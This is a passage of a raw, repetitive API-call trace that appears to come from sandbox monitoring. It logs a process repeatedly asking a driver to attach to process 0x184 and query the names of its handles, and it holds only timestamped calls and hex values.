ObfDereferenceObject (Object=0xfffff8a0015de660) returned 0x1 [0244.119] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.119] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.119] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.119] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.119] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.119] PsAcquireProcessExitSynchronization () returned 0x0 [0244.119] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.120] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001875a00, HandleInformation=0x0) returned 0x0 [0244.120] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.120] PsReleaseProcessExitSynchronization () returned 0x2 [0244.120] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.120] ObQueryNameString (in: Object=0xfffff8a001875a00, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.120] ObfDereferenceObject (Object=0xfffff8a001875a00) returned 0x1 [0244.120] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.120] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.120] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.120] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.120] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.120] PsAcquireProcessExitSynchronization () returned 0x0 [0244.120] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.120] ObReferenceObjectByHandle (in: Handle=0x47c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0014f75e0, HandleInformation=0x0) returned 0x0 [0244.120] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.120] PsReleaseProcessExitSynchronization () returned 0x2 [0244.120] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.120] ObQueryNameString (in: Object=0xfffff8a0014f75e0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.120] ObfDereferenceObject (Object=0xfffff8a0014f75e0) returned 0x1 [0244.120] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.120] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.120] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.120] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.120] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.120] PsAcquireProcessExitSynchronization () returned 0x0 [0244.120] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.120] ObReferenceObjectByHandle (in: Handle=0x484, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001876e90, HandleInformation=0x0) returned 0x0 [0244.120] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.120] PsReleaseProcessExitSynchronization () returned 0x2 [0244.120] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.120] ObQueryNameString (in: Object=0xfffff8a001876e90, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.121] ObfDereferenceObject (Object=0xfffff8a001876e90) returned 0x1 [0244.121] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.121] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.121] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.121] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.121] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.121] PsAcquireProcessExitSynchronization () returned 0x0 [0244.121] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.121] ObReferenceObjectByHandle (in: Handle=0x490, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001828a50, HandleInformation=0x0) returned 0x0 [0244.121] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.121] PsReleaseProcessExitSynchronization () returned 0x2 [0244.121] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.121] ObQueryNameString (in: Object=0xfffff8a001828a50, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.121] ObfDereferenceObject (Object=0xfffff8a001828a50) returned 0x1 [0244.121] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.121] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.121] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.121] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.121] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.121] PsAcquireProcessExitSynchronization () returned 0x0 [0244.121] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.121] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001309060, HandleInformation=0x0) returned 0x0 [0244.121] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.121] PsReleaseProcessExitSynchronization () returned 0x2 [0244.121] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.121] ObQueryNameString (in: Object=0xfffff8a001309060, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.121] ObfDereferenceObject (Object=0xfffff8a001309060) returned 0x1 [0244.121] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.121] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.121] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.122] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.122] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.122] PsAcquireProcessExitSynchronization () returned 0x0 [0244.122] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.122] ObReferenceObjectByHandle (in: Handle=0x4b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001885b90, HandleInformation=0x0) returned 0x0 [0244.122] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.122] PsReleaseProcessExitSynchronization () returned 0x2 [0244.122] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.122] ObQueryNameString (in: Object=0xfffff8a001885b90, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.122] ObfDereferenceObject (Object=0xfffff8a001885b90) returned 0x1 [0244.122] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.122] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.122] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.122] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.123] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.123] PsAcquireProcessExitSynchronization () returned 0x0 [0244.123] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.123] ObReferenceObjectByHandle (in: Handle=0x4c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00187c200, HandleInformation=0x0) returned 0x0 [0244.123] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.123] PsReleaseProcessExitSynchronization () returned 0x2 [0244.123] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.123] ObQueryNameString (in: Object=0xfffff8a00187c200, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.123] ObfDereferenceObject (Object=0xfffff8a00187c200) returned 0x1 [0244.123] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.123] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.123] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.123] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.123] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.123] PsAcquireProcessExitSynchronization () returned 0x0 [0244.123] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.123] ObReferenceObjectByHandle (in: Handle=0x4d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001890aa0, HandleInformation=0x0) returned 0x0 [0244.123] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.123] PsReleaseProcessExitSynchronization () returned 0x2 [0244.123] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.123] ObQueryNameString (in: Object=0xfffff8a001890aa0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.123] ObfDereferenceObject (Object=0xfffff8a001890aa0) returned 0x1 [0244.123] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.123] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.123] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.123] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.124] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.124] PsAcquireProcessExitSynchronization () returned 0x0 [0244.124] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.124] ObReferenceObjectByHandle (in: Handle=0x4e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001883230, HandleInformation=0x0) returned 0x0 [0244.124] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.124] PsReleaseProcessExitSynchronization () returned 0x2 [0244.124] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.124] ObQueryNameString (in: Object=0xfffff8a001883230, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.124] ObfDereferenceObject (Object=0xfffff8a001883230) returned 0x1 [0244.124] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.124] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.124] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.124] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.124] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.124] PsAcquireProcessExitSynchronization () returned 0x0 [0244.124] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.124] ObReferenceObjectByHandle (in: Handle=0x4f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00187fb60, HandleInformation=0x0) returned 0x0 [0244.124] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.124] PsReleaseProcessExitSynchronization () returned 0x2 [0244.124] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.124] ObQueryNameString (in: Object=0xfffff8a00187fb60, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.124] ObfDereferenceObject (Object=0xfffff8a00187fb60) returned 0x1 [0244.124] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.124] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.124] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.124] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.124] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.124] PsAcquireProcessExitSynchronization () returned 0x0 [0244.124] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.124] ObReferenceObjectByHandle (in: Handle=0x500, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00183fce0, HandleInformation=0x0) returned 0x0 [0244.124] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.125] PsReleaseProcessExitSynchronization () returned 0x2 [0244.125] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.125] ObQueryNameString (in: Object=0xfffff8a00183fce0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.125] ObfDereferenceObject (Object=0xfffff8a00183fce0) returned 0x1 [0244.125] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.125] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.125] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.125] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.125] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.125] PsAcquireProcessExitSynchronization () returned 0x0 [0244.125] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.125] ObReferenceObjectByHandle (in: Handle=0x510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00189db20, HandleInformation=0x0) returned 0x0 [0244.125] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.125] PsReleaseProcessExitSynchronization () returned 0x2 [0244.125] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.125] ObQueryNameString (in: Object=0xfffff8a00189db20, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.125] ObfDereferenceObject (Object=0xfffff8a00189db20) returned 0x1 [0244.125] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.125] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.125] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.125] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.125] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.125] PsAcquireProcessExitSynchronization () returned 0x0 [0244.125] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.125] ObReferenceObjectByHandle (in: Handle=0x520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018a2f30, HandleInformation=0x0) returned 0x0 [0244.125] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.125] PsReleaseProcessExitSynchronization () returned 0x2 [0244.125] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.125] ObQueryNameString (in: Object=0xfffff8a0018a2f30, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.125] ObfDereferenceObject (Object=0xfffff8a0018a2f30) returned 0x1 [0244.125] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.125] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.125] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.126] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.126] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.126] PsAcquireProcessExitSynchronization () returned 0x0 [0244.126] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.126] ObReferenceObjectByHandle (in: Handle=0x530, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018a19e0, HandleInformation=0x0) returned 0x0 [0244.126] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.126] PsReleaseProcessExitSynchronization () returned 0x2 [0244.126] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.126] ObQueryNameString (in: Object=0xfffff8a0018a19e0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.126] ObfDereferenceObject (Object=0xfffff8a0018a19e0) returned 0x1 [0244.126] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.126] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.126] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.126] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.126] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.126] PsAcquireProcessExitSynchronization () returned 0x0 [0244.126] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.126] ObReferenceObjectByHandle (in: Handle=0x540, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00183fb00, HandleInformation=0x0) returned 0x0 [0244.126] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.126] PsReleaseProcessExitSynchronization () returned 0x2 [0244.126] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.126] ObQueryNameString (in: Object=0xfffff8a00183fb00, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.126] ObfDereferenceObject (Object=0xfffff8a00183fb00) returned 0x1 [0244.126] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.126] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.126] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, 